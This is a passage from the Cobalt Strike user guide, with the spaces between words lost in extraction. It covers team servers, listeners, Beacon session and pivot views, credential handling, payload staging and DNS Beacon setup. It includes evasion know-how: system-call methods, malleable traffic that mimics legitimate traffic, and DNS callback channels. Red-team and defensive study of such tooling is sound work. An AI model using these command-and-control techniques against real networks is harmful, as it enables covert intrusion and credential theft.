TheCobaltStrikeclientmayconnecttomultipleteamservers.GotoCobalt Strike ->New
|
||
Connection toinitiateanewconnection.Whenconnectedtomultipleservers,aswitchbarwill
|
||
showupatthebottomofyourCobaltStrikewindow.
|
||
figure7-ServerSwitchbar
|
||
CobaltStrikeUserGuide www.fortra.com page:23
|
||
|
||
WelcometoCobaltStrike/ScriptingCobaltStrike
|
||
ThisswitchbarallowsyoutoswitchbetweenactiveCobaltStrikeserverinstances.Eachserver
|
||
hasitsownbutton.Right-clickabuttonandselectRenametomakethebutton’stextreflectthe
|
||
roleoftheserverduringyourengagement.Theserverbuttonwilldisplaytheactivebuttonin
|
||
boldtextandcolorbasedoncolorpreferencefoundinCobalt Strike -> Preferences ->
|
||
TeamServerstobetterindicatewhichbuttonisactive.Thisbuttonnamewillalsoidentifythe
|
||
serverintheCobaltStrikeActivityReport.
|
||
Whenconnectedtomultipleservers,CobaltStrikeaggregateslistenersfromalloftheservers
|
||
it’sconnectedto.Thisaggregationallowsyoutosendaphishingemailfromoneserverthat
|
||
referencesamaliciouswebsitehostedonanotherserver.Attheendofyourengagement,
|
||
CobaltStrike’sreportingfeaturewillqueryalloftheserversyou’reconnectedtoandmergethe
|
||
datatotellonestory.
|
||
Reconnecting the Client
|
||
Whentheclientdisconnectionisuser-initiatedwiththeMenu,ToolbarorSwitchbarServer
|
||
button,aredbannerdisplayswithaReconnectandClosebutton.
|
||
PressClosetoclosethewindow.PressReconnecttoreconnecttotheTeamServer.
|
||
IftheTeamServerisnotavailableadialogdisplaysaskingifyouwanttoretry(Yes/No).IfYes
|
||
thenconnectionisattemptedagain(repeatsifneeded).IfNo,thedialogcloses.
|
||
WhendisconnectionisinitiatedbytheTeamServerorothernetworkinterruptiontheredbanner
|
||
willdisplayamessagewithacountdownforconnectionretry.Thiswillrepeatuntilaconnection
|
||
ismadewiththeTeamServerortheuserclicksonClose.Inthiscasetheusercaninteractwith
|
||
otherpartsoftheUI.
|
||
Whentheclientreconnects,theredreconnectbardisappears.
|
||
Scripting Cobalt Strike
|
||
CobaltStrikeUserGuide www.fortra.com page:24
|
||
|
||
WelcometoCobaltStrike/ScriptingCobaltStrike
|
||
CobaltStrikeisscriptablethroughitsAggressorScriptlanguage.AggressorScriptallowsyouto
|
||
modifyandextendtheCobaltStrikeclient.
|
||
History
|
||
AggressorScriptisthespiritualsuccessortoCortana,theopensourcescriptingenginein
|
||
Armitage.CortanawasmadepossiblebyacontractthroughDARPA'sCyberFastTrack
|
||
program.CortanaallowsitsuserstoextendArmitageandcontroltheMetasploit® Framework
|
||
anditsfeaturesthroughArmitage'steamserver.CobaltStrike3.0isaground-uprewriteof
|
||
CobaltStrikewithoutArmitageasafoundation.Thischangeaffordedanopportunitytorevisit
|
||
CobaltStrike'sscriptingandbuildsomethingaroundCobaltStrike'sfeatures.Theresultofthis
|
||
workisAggressorScript.
|
||
AggressorScriptisascriptinglanguageforredteamoperationsandadversarysimulations
|
||
inspiredbyscriptableIRCclientsandbots.Itspurposeistwo-fold.Youmaycreatelongrunning
|
||
botsthatsimulatevirtualredteammembers,hackingside-by-sidewithyou.Youmayalsouseit
|
||
toextendandmodifytheCobaltStrikeclienttoyourneeds.
|
||
Loading Scripts
|
||
AggressorScriptisbuiltintotheCobaltStrikeclient.Tomanagescripts,gotoCobalt Strike ->
|
||
Script ManagerandpressLoad.
|
||
figure8-ScriptManager
|
||
AdefaultscriptinsideofCobaltStrikedefinesallofCobaltStrike’spopupmenusandformats
|
||
informationdisplayedinCobaltStrike’sconsoles.ThroughtheAggressorScriptengine,you
|
||
mayoverridethesedefaultsandcustomizeCobaltStriketoyourpreferences.
|
||
YoumayalsouseAggressorScripttoaddnewfeaturestoCobaltStrike’sBeaconandto
|
||
automatecertaintasks.
|
||
TolearnmoreaboutAggressorScript,seeAggressor Script on page 186.
|
||
CobaltStrikeUserGuide www.fortra.com page:25
|
||
|
||
WelcometoCobaltStrike/RunningtheClientonMacOSX
|
||
Running the Client on Mac OS X
|
||
TheCobaltStrikeclientmaynotbeabletoshowcontentsoftheDocuments,Desktop,and
|
||
Downloadsfoldersinthefilebrowserinitially.(e.g.loadingscripts,uploadingfiles,generating
|
||
payloads,etc…)
|
||
Bydefault,OSXlimitswhataccessapplicationshavetotheDocuments,Desktop,andDownload
|
||
folders.Theseapplicationsneedtoexplicitlybegrantedaccesstothesefolders.
|
||
SinceCobaltStrikeisathirdpartyapplication,itisn'tasstraightforwardasgrantingtheapp
|
||
"CobaltStrike"access.YoumayneedtogivetheJRErunningCobaltStrikeclientaccesstothe
|
||
filesystem.YoucangiveaccesstothespecificFilesandFoldersorFullDiskAccess.
|
||
Youmaybepromptedfortheaccess:
|
||
figure9-MacOSXAccessPrompt
|
||
Or,iftheaccesshasbeenpreviouslydenied,youmayneedtoedittheaccessintheOSXSystem
|
||
Preferences/Security&Privacy/Privacydialog:
|
||
CobaltStrikeUserGuide www.fortra.com page:26
|
||
|
||
WelcometoCobaltStrike/RunningtheClientonMacOSX
|
||
figure10-OSXPrivacyDialog
|
||
PleasebeadvisedthatotherapplicationsthatusetheJREwillalsohavethisaccess.
|
||
NOTE:
|
||
Thesamestepsmayalsoneedtobetakenfor'/bin/bash'.
|
||
CobaltStrikeUserGuide www.fortra.com page:27
|
||
|
||
UserInterface/Overview
|
||
User Interface
|
||
Overview
|
||
TheCobaltStrikeuserinterfaceissplitintotwoparts.Thetopoftheinterfaceshowsa
|
||
visualizationofsessionsortargets.ThebottomoftheinterfacedisplaystabsforeachCobalt
|
||
Strikefeatureorsessionyouinteractwith.Youmayclicktheareabetweenthesetwopartsand
|
||
resizethemtoyourliking.
|
||
figure11-CobaltStrikeUserInterface
|
||
Toolbar
|
||
ThetoolbaratthetopofCobaltStrikeoffersquickaccesstocommonCobaltStrikefunctions.
|
||
KnowingthetoolbarbuttonswillspeedupyouruseofCobaltStrikeconsiderably.
|
||
Connecttoanotherteamserver
|
||
Disconnectfromthecurrentteamserver
|
||
CreateandeditCobaltStrike’slisteners
|
||
ShowSessionsinGraphView
|
||
CobaltStrikeUserGuide www.fortra.com page:28
|
||
|
||
UserInterface/SessionandTargetVisualizations
|
||
ShowSessioninTableView
|
||
ShowTargetsinTableView
|
||
ManageWebServer
|
||
ViewCredentials
|
||
ViewDownloadFiles
|
||
ViewKeystrokes
|
||
ViewScreenshots
|
||
Session and Target Visualizations
|
||
CobaltStrikehasseveralvisualizationseachdesignedtoaidadifferentpartofyour
|
||
engagement.Youmayswitchbetweenvisualizationsthrough(PivotGraph,SessionTable,
|
||
TargetTable)buttons onthetoolbarortheCobalt Strike ->Visualization menu.
|
||
Pivot Graph
|
||
CobaltStrikehastheabilitytolinkmultipleBeaconsintoachain.TheselinkedBeaconsreceive
|
||
theircommandsandsendtheiroutputthroughtheparentBeaconintheirchain.Thistypeof
|
||
chainingisusefultocontrolwhichsessionsegressanetworkandtoemulateadisciplinedactor
|
||
whorestrictstheircommunicationpathsinsideofanetworktosomethingplausible.This
|
||
chainingofBeaconsisoneofthemostpowerfulfeaturesinCobaltStrike.
|
||
CobaltStrike’sworkflowsmakethischainingveryeasy.It’snotuncommonforCobaltStrike
|
||
operatorstochainBeaconsfourorfivelevelsdeeponaregularbasis.Withoutavisualaidit’s
|
||
verydifficulttokeeptrackofandunderstandthesechains.ThisiswherethePivotGraphcomes
|
||
in.
|
||
ThePivotGraphshowsyourBeaconchainsinanaturalway.EachBeaconsessionhasanicon.
|
||
Aswiththesessionstable:theiconforeachhostindicatesitsoperatingsystem.Iftheiconis
|
||
redwithlightningbolts,theBeaconisrunninginaprocesswithadministratorprivileges.A
|
||
darkericonindicatesthattheBeaconsessionwasaskedtoexitanditacknowledgedthis
|
||
command.
|
||
ThefirewalliconrepresentstheegresspointofyourBeaconpayload.Adashed green line
|
||
indicatestheuseofbeaconingHTTPorHTTPSconnectionstoleavethenetwork.Ayellow
|
||
dashed line indicatestheuseofDNStoleavethenetwork.
|
||
CobaltStrikeUserGuide www.fortra.com page:29
|
||
|
||
UserInterface/SessionandTargetVisualizations
|
||
figure12-CobaltStrikeGraphView
|
||
AnarrowconnectingoneBeaconsessiontoanotherrepresentsalinkbetweentwoBeacons.
|
||
CobaltStrike’sBeaconusesWindowsnamedpipesandTCPsocketstocontrolBeaconsinthis
|
||
peer-to-peerfashion.Anorange arrow isanamedpipechannel.SSHsessionsuseanorange
|
||
arrowaswell.Ablue arrow isaTCPsocketchannel.Ared (namedpipe)orpurple (TCP)arrow
|
||
indicatesthataBeaconlinkisbroken.
|
||
ClickaBeacontoselectit.YoumayselectmultipleBeaconsbyclickinganddraggingaboxover
|
||
thedesiredhosts.PressCtrlandShiftandclicktoselectorunselectanindividualBeacon.
|
||
Right-clickaBeacontobringupamenuwithavailablepost-exploitationoptions.
|
||
SeveralkeyboardshortcutsareavailableinthePivotGraph.
|
||
l Ctrl+Plus —zoom in
|
||
l Ctrl+Minus —zoom out
|
||
l Ctrl+0 —resetthezoom level
|
||
l Ctrl+A —selectallhosts
|
||
l Escape —clearselection
|
||
l Ctrl+C —arrangehostsintoacircle
|
||
l Ctrl+S —arrangehostsintoastack
|
||
l Ctrl+H —arrangehostsintoahierarchy.
|
||
Right-clickthePivotGraphwithnoselectedBeaconstoconfigurethelayoutofthisgraph.This
|
||
menualsohasanUnlinkedmenu.SelectHide tohideunlinkedsessionsinthepivotgraph.
|
||
SelectShow toshowunlinkedsessionsagain.
|
||
Sessions Table
|
||
CobaltStrikeUserGuide www.fortra.com page:30
|
||
|
||
UserInterface/SessionandTargetVisualizations
|
||
ThesessionstableshowswhichBeaconsarecallinghometothisCobaltStrikeinstance.
|
||
BeaconisCobaltStrike’spayloadtoemulateadvancedthreatactors.Here,youwillseethe
|
||
externalIPaddressofeachBeacon,theinternalIPaddress,theegresslistenerforthatBeacon,
|
||
whentheBeaconlastcalledhome,andotherinformation.Nexttoeachrowisaniconindicating
|
||
theoperatingsystemofthecompromisedtarget.Iftheiconisredwithlightningbolts,the
|
||
Beaconisrunninginaprocesswithadministratorprivileges.Afadediconindicatesthatthe
|
||
Beaconsessionwasaskedtoexitanditacknowledgedthiscommand.
|
||
figure13-CobaltStrikeBeaconManagementTool
|
||
IfyouuseaDNSBeaconlistener,beawarethatCobaltStrikewillnotknowanythingabouta
|
||
hostuntilitchecksinforthefirsttime.Ifyouseeanentrywithalastcalltimeandthat’sit,you
|
||
willneedtogivethatBeaconitsfirsttasktoseemoreinformation.
|
||
Right-clickoneormoreBeacon’stoseeyourpost-exploitationoptions.
|
||
Targets Table
|
||
TheTargetsTableshowsthetargetsinCobaltStrike’sdatamodel.Thetargetstabledisplays
|
||
theIPaddressofeachtarget,itsNetBIOSname,andanotethatyouoroneofyourteam
|
||
membersassignedtothetarget.Theicontotheleftofatargetindicatesitsoperatingsystem.A
|
||
rediconwithlightningboltsindicatesthatthetargethasaCobaltStrikeBeaconsession
|
||
associatedwithit.
|
||
figure14-CobaltStrikeTargetsView
|
||
Clickanyofthetableheaderstosortthehosts.Highlightarowandright-clickittobringupa
|
||
menuwithoptionsforthathost.PressCtrlandAltandclicktoselectanddeselectindividual
|
||
hosts.
|
||
Thetarget’stableisausefulforlateralmovementandtounderstandyourtarget’snetwork.
|
||
CobaltStrikeUserGuide www.fortra.com page:31
|
||
|
||
UserInterface/Tabs
|
||
Tabs
|
||
CobaltStrikeopenseachdialog,console,andtableinatab.ClicktheX buttontocloseatab.
|
||
UseCtrl+D toclosetheactivetab.Ctrl+Shift+D willclosealltabsexcepttheactiveon.
|
||
Youmayright-clicktheX buttontoopenatabinawindow,takeascreenshotofatab,orclose
|
||
alltabswiththesamename.
|
||
Keyboardshortcutsexistforthesefunctionstoo.UseCtrl+W toopentheactivetabinitsown
|
||
window.UseCtrl+T toquicklysaveascreenshotoftheactivetab.
|
||
Ctrl+B willsendthecurrenttabtothebottomoftheCobaltStrikewindow.Thisisusefulfortabs
|
||
thatyouneedtoconstantlywatch.Ctrl+E willundothisactionandremovethetabatthe
|
||
bottomoftheCobaltStrikewindow.
|
||
HoldshiftandclickX toclosealltabswiththesamename.Holdshift+controlandclickX to
|
||
openthetabinitsownwindow.
|
||
UseCtrl+Left andCtrl+Right toquicklyswitchtabs.Youmaydraganddroptabstochange
|
||
theirorder.
|
||
TIP:
|
||
ThefulllistofDefaultKeyboardShortcutsareavailablefromthemenu(Help -> Default
|
||
Keyboard Shortcuts).
|
||
Consoles
|
||
CobaltStrikeprovidesaconsoletointeractwithBeaconsessions,scripts,andchatwithyour
|
||
teammates.
|
||
figure15-AConsoleTab
|
||
CobaltStrikeUserGuide www.fortra.com page:32
|
||
|
||
UserInterface/Tables
|
||
Theconsolestrackyourcommandhistory.Usetheup arrow tocyclethroughpreviouslytyped
|
||
commands.Thedown arrow movesbacktothelastcommandyoutyped.Thehistory
|
||
commandlistspreviouslytypedcommands.The!commandallowspreviouslytyped
|
||
commandstoberanagain.
|
||
NOTE:
|
||
Thelistofpreviouslytypedcommandsisnotmaintainedbetweensessions.Closinga
|
||
consolewindowandthenreopeningitwillstartwithnopreviouslytypedcommands.
|
||
UsetheTab keytocompletecommandsandparameters.
|
||
UseCtrl+Plus tomaketheconsolefontsizelarger,Ctrl+Minus tomakeitsmaller,andCtrl+0
|
||
toresetit.Thischangeislocaltothecurrentconsoleonly.VisitCobalt Strike ->Preferences to
|
||
permanentlychangethefont.
|
||
PressCtrl+F toshowapanelthatwillletyousearchfortextwithintheconsole.UseCtrl+A to
|
||
selectalltextintheconsole’sbuffer.
|
||
TIP:
|
||
ThefulllistofDefaultKeyboardShortcutsareavailablefromthemenu(Help -> Default
|
||
Keyboard Shortcuts).
|
||
Tables
|
||
CobaltStrikeusestablestodisplaysessions,credentials,targets,andotherengagement
|
||
information.
|
||
MosttablesinCobaltStrikehaveanoptiontoassignacolorhighlighttothehighlightedrows.
|
||
ThesehighlightsarevisibletootherCobaltStrikeclients.Right-clickandlookfortheColor
|
||
menu.
|
||
PressCtrl+F withinatabletoshowthetablesearchpanel.Thisfeatureletsyoufilterthecurrent
|
||
table.
|
||
CobaltStrikeUserGuide www.fortra.com page:33
|
||
|
||
UserInterface/KeyboardShortcuts
|
||
figure16-TablewithSearchPanel
|
||
Thetextfieldiswhereyoutypeyourfiltercriteria.Theformatofthecriteriadependsonthe
|
||
columnyouchoosetoapplythefilterto.UseCIDR notation(e.g.,192.168.1.0/24)andhost
|
||
ranges(192.168.1-192.169.200)tofiltercolumnsthatcontainaddresses.Usenumbersor
|
||
rangesofnumbersforcolumnsthatcontainnumbers.Usewildcardcharacters(*,?)tofilter
|
||
columnsthatcontainstrings.
|
||
The! buttonnegatesthecurrentcriteria.Pressenter toapplythespecifiedcriteriatothecurrent
|
||
table.Youmaystackasmanycriteriatogetherasyoulike.TheReset buttonwillremovethe
|
||
filtersappliedtothecurrenttable.
|
||
Keyboard Shortcuts
|
||
Therearemanydefaultkeyboardshortcutsavailabletoyouwhenworkingintheuserinterface.
|
||
SomecanbeusedanywherewhileothersarespecifictodifferentareasoftheUI.Fromthe
|
||
menu,selectingHelp -> Default Keyboard Shortcutsopensthefollowingreferencedialog:
|
||
CobaltStrikeUserGuide www.fortra.com page:34
|
||
|
||
UserInterface/KeyboardShortcuts
|
||
figure17-DefaultKeyboardShortcuts
|
||
TheAggressorfunction,openDefaultShortcutsDialog,canalsobeusedtoopenthesamelist.
|
||
CobaltStrikeUserGuide www.fortra.com page:35
|
||
|
||
DataManagement/Overview
|
||
Data Management
|
||
Overview
|
||
CobaltStrike’steamserverisabrokerforinformationcollectedbyCobaltStrikeduringyour
|
||
engagement.CobaltStrikeparsesoutputfromitsBeaconpayloadtoextracttargets,services,
|
||
andcredentials.
|
||
Ifyou’dliketoexportCobaltStrike’sdata,youmaydosothroughReporting ->Export Data.
|
||
CobaltStrikeprovidesoptionstoexportitsdataasTSVandXMLfiles.TheCobaltStrikeclient’s
|
||
exportdatafeaturemergesdatafromalloftheteamserversyou’recurrentlyconnectedtoand
|
||
exportTSVandXMLfileswithdatainCobaltStrike'sdatamodel..
|
||
Targets
|
||
YoumayinteractwithCobaltStrike’stargetinformationthroughView ->Targets.Thistab
|
||
displaysthesameinformationastheTargetsVisualization.
|
||
PressImport toimportafilewithtargetinformation.CobaltStrikeacceptsflattextfileswithone
|
||
hostperline.ItalsoacceptsXMLfilesgeneratedbyNmap(the–oXoption).
|
||
PressAdd toaddnewtargetstoCobaltStrike’sdatamodel.
|
||
CobaltStrikeUserGuide www.fortra.com page:36
|
||
|
||
DataManagement/Services
|
||
figure18-AddaTarget
|
||
ThisdialogallowsyoutoaddmultiplehoststoCobaltStrike’sdatabase.SpecifyarangeofIP
|
||
addressesoruseCIDR notationintheAddressfieldtoaddmultiplehostsatonetime.Hold
|
||
downshiftwhenyouclickSavetoaddhoststothedatamodelandkeepthisdialogopen.
|
||
Selectoneormorehostsandright-clicktobringupthehostsmenu.Thismenuiswhereyou
|
||
changethenoteonthehosts,settheiroperatingsysteminformation,orremovethehostsfrom
|
||
thedatamodel.
|
||
Services
|
||
Fromatargetsdisplay,right-clickahost,andselectServices.ThiswillopenCobaltStrike’s
|
||
servicesbrowser.Hereyoumaybrowseservices,assignnotestodifferentservices,andremove
|
||
serviceentriesaswell.
|
||
figure19-TheServicesDialog
|
||
Credentials
|
||
GotoView ->Credentials tointeractwithCobaltStrike’scredentialmodel.
|
||
PressAdd toaddanentrytothecredentialmodel.Again,youmayholdshiftandpressSave to
|
||
keepthedialogopenandmakeiteasiertoaddnewcredentialstothemodel.
|
||
PressCopy tocopythehighlightedentriestoyourclipboard.
|
||
UseExport toexportcredentialsinPWDumpformat.
|
||
figure20-TheCredentialModel
|
||
CobaltStrikeUserGuide www.fortra.com page:37
|
||
|
||
DataManagement/Maintenance
|
||
Maintenance
|
||
CobaltStrike’sdatamodelkeepsallofitsstateandstatemetadatainthedata/folder.This
|
||
folderexistsinthefolderyourantheCobaltStriketeamserverfrom.
|
||
ToclearCobaltStrike’sdatamodel:stoptheteamserver,deletethedata/folder,andits
|
||
contents.CobaltStrikewillrecreatethedata/folderwhenyoustarttheteamservernext.
|
||
Ifyou’dliketoarchivethedatamodel,stoptheteamserver,anduseyourfavoriteprogramto
|
||
storethedata/folderanditsfileselsewhere.Torestorethedatamodel,stoptheteamserver,
|
||
andrestoretheoldcontenttothedata/folder.
|
||
Reporting ->Reset Data resetsCobaltStrike’sDataModelwithoutateamserverrestart.
|
||
Clearing Team Server Data
|
||
Anewscripthasbeenaddedfortheteamserverwhichclearsthedataandstatefromthe
|
||
TeamServertoreturnittoadefaultstate.Enterthefollowingcommand:
|
||
./clearteamserverdata
|
||
AwarningwilldisplayandyouwillhavetoenterCLEAR forthecommandtocontinue.
|
||
Theerrorsshownaretobeexpectedwhenthefolderstobedeleteddonotexist.Inthiscase
|
||
therearenodownloads,screenshotsoruploadsfolderssotheycouldnotbedeleted.Anyfiles
|
||
offolderswhichcouldnotbedeletedwillbelisted.
|
||
CobaltStrikeUserGuide www.fortra.com page:38
|
||
|
||
ListenerandInfrastructureManagement/Overview
|
||
Listener and Infrastructure
|
||
Management
|
||
Overview
|
||
Thefirststepofanyengagementistosetupinfrastructure.InCobaltStrike’scase,
|
||
infrastructureconsistsofoneormoreteamservers,redirectors,andDNSrecordsthatpointto
|
||
yourteamserversandredirectors.Onceyouhaveateamserverupandrunning,youwillwant
|
||
toconnecttoit,andconfigureittoreceiveconnectionsfromcompromisedsystems.Listeners
|
||
areCobaltStrike’smechanismtodothis.
|
||
AlistenerissimultaneouslyconfigurationinformationforapayloadandadirectiveforCobalt
|
||
Striketostandupaservertoreceiveconnectionsfromthatpayload.Alistenerconsistsofa
|
||
user-definedname,thetypeofpayload,andseveralpayload-specificoptions.
|
||
Listener Management
|
||
TomanageCobaltStrikelisteners,gotoCobalt Strike ->Listeners.Thiswillopenatablisting
|
||
allofyourconfiguredpayloadsandlisteners.
|
||
figure21-ListenerManagementTab
|
||
PressAdd tocreateanewlistener.TheNewListenerpaneldisplays.
|
||
CobaltStrikeUserGuide www.fortra.com page:39
|
||
|
||
ListenerandInfrastructureManagement/ListenerManagement
|
||
figure22-NewListenerPanel
|
||
UsethePayloaddrop-downtoselectoneoftheavailablepayload/listenertypesyouwishto
|
||
configure.Eachhasdifferentparametersandaredescribedinthefollowingsections:
|
||
DNS Beacon on page 44
|
||
HTTP Beacon and HTTPS Beacon on page 50
|
||
SMB Beacon on page 56
|
||
TCP Beacon on page 59
|
||
CobaltStrikeUserGuide www.fortra.com page:40
|
||
|
||
ListenerandInfrastructureManagement/CobaltStrike’sBeaconPayload
|
||
External C2 on page 62
|
||
Foreign Listeners on page 64
|
||
Toeditalistener,highlightalistenerandpressEdit.Toremovealistener,highlightthelistener
|
||
andpressRemove.
|
||
Cobalt Strike’s Beacon Payload
|
||
Mostcommonly,youwillconfigurelistenersforCobaltStrike’sBeaconpayload.Beaconis
|
||
CobaltStrike’spayloadtomodeladvancedattackers.UseBeacontoegressanetworkover
|
||
HTTP,HTTPS,orDNS.Youmayalsolimitwhichhostsegressanetworkbycontrollingpeer-to-
|
||
peerBeaconsoverWindowsnamedpipesandTCPsockets.
|
||
Beaconisflexibleandsupportsasynchronousandinteractivecommunication.Asynchronous
|
||
communicationislowandslow.Beaconwillphonehome,downloaditstasks,andgotosleep.
|
||
Interactivecommunicationhappensinreal-time.
|
||
Beacon’snetworkindicatorsaremalleable.RedefineBeacon’scommunicationwithCobalt
|
||
Strike’smalleableC2language.ThisallowsyoutocloakBeaconactivitytolooklikeother
|
||
malwareorblend-inaslegitimatetraffic.SeeMalleable Command and Control on page 129
|
||
formoreinformation.
|
||
System Calls
|
||
TheBeaconpayloadhasimplementedtheabilitytousesystemcallsinsteadofthestandard
|
||
WindowsAPIfunctions.CurrentlyBeaconsupportsalimitedsetoffunctionsforthiscapability.
|
||
Thefollowingfunctionssupporttheuseofsystemcalls:
|
||
l CloseHandle
|
||
l CreateFileMapping
|
||
l CreateRemoteThread
|
||
l CreateThread
|
||
l DuplicateHandle
|
||
l GetThreadContext
|
||
l MapViewOfFile
|
||
l OpenProcess
|
||
l OpenThread
|
||
l ReadProcessMemory
|
||
CobaltStrikeUserGuide www.fortra.com page:41
|
||
|
||
ListenerandInfrastructureManagement/CobaltStrike’sBeaconPayload
|
||
l ResumeThread
|
||
l SetThreadContext
|
||
l UnmapViewOfFile
|
||
l VirtualAlloc
|
||
l VirtualAllocEx
|
||
l VirtualFree
|
||
l VirtualProtect
|
||
l VirtualProtectEx
|
||
l VirtualQuery
|
||
l WriteProcessMemory
|
||
WhenyougenerateastagelessbeaconpayloadfromtheCobaltStrikeUIorasupported
|
||
aggressorfunction,youcanchoosewhichsystemcallmethodwillbeusedatexecutiontime.
|
||
System Call Method Description
|
||
None UsethestandardWindowsAPIfunction
|
||
Direct UsetheNt*versionofthefunction
|
||
Indirect JumptotheappropriateinstructionwithintheNt*
|
||
versionofthefunction
|
||
Therearesomecommandsandworkflowsthatinjectorspawnanewbeaconthatdonotallow
|
||
youtosettheinitialsystemcallmethod.Inthesecases,settingthe‘stage.syscall_method’
|
||
settingintheprofilewillallowyoutocontroltheinitialmethodusedatexecutiontime.
|
||
Thefollowingcommandsandworkflowsusethestage.syscall_methodsetting:
|
||
l elevate
|
||
l inject
|
||
l jump
|
||
l spawn
|
||
l spawnas
|
||
l spawnu
|
||
l team serverrespondingtoastagelesspayloadrequest
|
||
l team serverrespondingtoanexternalc2payloadrequest
|
||
Usethesyscall-method [method]commandtomodifywhichmethodwillbeusedfor
|
||
subsequentcommands.Inaddition,syscall-methodwithoutanyargumentswillquerythe
|
||
currentmethod.
|
||
CobaltStrikeUserGuide www.fortra.com page:42
|
||
|
||
ListenerandInfrastructureManagement/PayloadStaging
|
||
Payload Security Features
|
||
CobaltStriketakesstepstoprotectBeaconscommunicationandtoensurethataBeaconcan
|
||
onlyreceivetasksfromandsendoutputtoitsteamserver.
|
||
WhenyousetuptheBeaconpayloadforthefirsttime,CobaltStrikewillgeneratea
|
||
public/privatekeypairthatisuniquetoyourteamserver.Theteamserver’spublickeyis
|
||
embeddedintoBeacon’spayloadstage.Beaconusestheteamserver’spublickeytoencrypt
|
||
sessionmetadatathatitsendstotheteamserver.
|
||
Beaconmustalwayssendsessionmetadatabeforetheteamservercanissuetasksand
|
||
receiveoutputfromtheBeaconsession.Thismetadatacontainsarandomsessionkey
|
||
generatedbythatBeacon.TheteamserveruseseachBeacon’ssessionkeytoencrypttasks
|
||
andtodecryptoutput.
|
||
EachBeaconimplementationanddatachannelusesthissamescheme.Youhavethesame
|
||
securitywiththeArecorddatachannelintheHybridHTTPandDNSBeaconasyoudowiththe
|
||
HTTPSBeacon.
|
||
BeawarethattheaboveappliestoBeacononceitisstaged.Thepayloadstagers,duetotheir
|
||
size,donothavebuilt-insecurityfeatures.
|
||
Payload Staging
|
||
Onetopicthatdeservesmention,asbackgroundinformation,ispayloadingstaging.Many
|
||
attackframeworksdecoupletheattackfromthestuffthattheattackexecutes.Thisstuffthat
|
||
anattackexecutesisknownasapayload.Payloadsareoftendividedintotwoparts:thepayload
|
||
stageandthepayloadstager.Astagerisasmallprogram,usuallyhand-optimizedassembly,
|
||
thatdownloadsapayloadstage,injectsitintomemory,andpassesexecutiontoit.Thisprocess
|
||
isknownasstaging.
|
||
Thestagingprocessisnecessaryinsomeoffenseactions.Manyattackshavehardlimitson
|
||
howmuchdatatheycanloadintomemoryandexecuteaftersuccessfulexploitation.This
|
||
greatlylimitsyourpost-exploitationoptions,unlessyoudeliveryourpost-exploitationpayloadin
|
||
stages.
|
||
CobaltStrikedoesusestaginginitsuser-drivenattacks.Thesearemostoftheitemsunder
|
||
PayloadsandAttacks.Thestagersusedintheseplacesdependonthepayloadpairedwiththe
|
||
attack.Forexample,theHTTPBeaconhasanHTTPstager.TheDNSBeaconhasaDNSTXT
|
||
recordstager.Notallpayloadshavestageroptions.Payloadswithnostagercannotbe
|
||
deliveredwiththeseattackoptions.
|
||
Ifyoudon’tneedpayloadstaging,youcanturnitoff.Setthehost_stage optioninyour
|
||
MalleableC2profiletofalse.ThiswillpreventCobaltStrikefromhostingpayloadstagesonits
|
||
CobaltStrikeUserGuide www.fortra.com page:43
|
||
|
||
ListenerandInfrastructureManagement/DNSBeacon
|
||
webandDNSservers.ThereisabigOPSECbenefittodoingthis.Withstagingon,anyonecan
|
||
connecttoyourserver,requestapayload,andanalyzeitscontentstofindinformationfrom
|
||
yourpayloadconfiguration.
|
||
InCobaltStrike4.0andlater,post-exploitationandlateralmovementactionseschewstagers
|
||
andopttodeliverafullpayloadwherepossible.Ifyoudisablepayloadstaging,youshouldn’t
|
||
noticeitonceyou’rereadytodopost-exploitation.
|
||
DNS Beacon
|
||
TheDNSBeaconisafavoriteCobaltStrikefeature.ThispayloadusesDNSrequeststobeacon
|
||
backtoyou.TheseDNSrequestsarelookupsagainstdomainsthatyourCobaltStriketeam
|
||
serverisauthoritativefor.TheDNSresponsetellsBeacontogotosleeportoconnecttoyouto
|
||
downloadtasks.TheDNSresponsewillalsotelltheBeaconhowtodownloadtasksfromyour
|
||
teamserver.
|
||
figure23-DNSBeaconinAction
|
||
InCobaltStrike4.0andlater,theDNSBeaconisaDNS-onlypayload.ThereisnoHTTP
|
||
communicationmodeinthispayload.Thisisachangefrompriorversionsoftheproduct.
|
||
Data Channels
|
||
Today,theDNSBeaconcandownloadtasksoverDNSTXTrecords,DNSAAAArecords,orDNS
|
||
Arecords.Thispayloadhastheflexibilitytochangebetweenthesedatachannelswhileitson
|
||
target.UseBeacon’smodecommandtochangethecurrentBeacon’sdatachannel.mode dns
|
||
CobaltStrikeUserGuide www.fortra.com page:44
|
||
|
||
ListenerandInfrastructureManagement/DNSBeacon
|
||
istheDNSArecorddatachannel.mode dns6 istheDNSAAAArecordchannel.And,mode dns-
|
||
txt istheDNSTXTrecorddatachannel.ThedefaultistheDNSTXTrecorddatachannel.
|
||
BeawarethatDNSBeacondoesnotcheckinuntilthere’sataskavailable.Usethecheckin
|
||
commandtorequestthattheDNSBeaconcheckinnexttimeitcallshome.
|
||
DNS Listener Setup
|
||
TocreateaDNSBeaconlistenerselectCobalt Strike -> Listenersonthemainmenuandpress
|
||
theAddbuttonatthebottomoftheListenerstabdisplay.
|
||
TheNewListenerpaneldisplays.
|
||
CobaltStrikeUserGuide www.fortra.com page:45
|
||
|
||
ListenerandInfrastructureManagement/DNSBeacon
|
||
figure24-DNSBeaconOptions
|
||
SelectBeacon DNSasthePayloadtypeandgivethelisteneraName.Makesuretogivethe
|
||
newlisteneramemorablenameasthisnameishowyouwillrefertothislistenerthrough
|
||
CobaltStrike’scommandsandworkflows.
|
||
Parameters
|
||
CobaltStrikeUserGuide www.fortra.com page:46
|
||
|
||
ListenerandInfrastructureManagement/DNSBeacon
|
||
DNS Hosts-Press[+] toaddoneormoredomainstobeaconto.YourCobaltStrike
|
||
teamserversystemmustbeauthoritativeforthedomainsyouspecify.Createa
|
||
DNSArecordandpointittoyourCobaltStriketeamserver.UseDNSNSrecords
|
||
todelegateseveraldomainsorsub-domainstoyourCobaltStriketeamserver’sA
|
||
record.
|
||
Thelengthofthebeaconhostlistinbeaconpayloadislimitedto255characters.
|
||
ThisincludesarandomlyassignedURIforeachhostanddelimitersbetween
|
||
eachiteminthelist.Ifthelengthisexceeded,hostswillbedroppedfromtheend
|
||
ofthelistuntilitfitsinthespace.Therewillbemessagesintheteamserverlog
|
||
fordroppedhosts.
|
||
Host Rotation Strategy-Thisvalueconfiguresthebeaconsbehaviorforchoosing
|
||
whichhost(s)fromthelisttouseforegress.Selectoneofthefollowing:
|
||
round-robin:Selecttoloopthroughthelistofhostnamesintheordertheyare
|
||
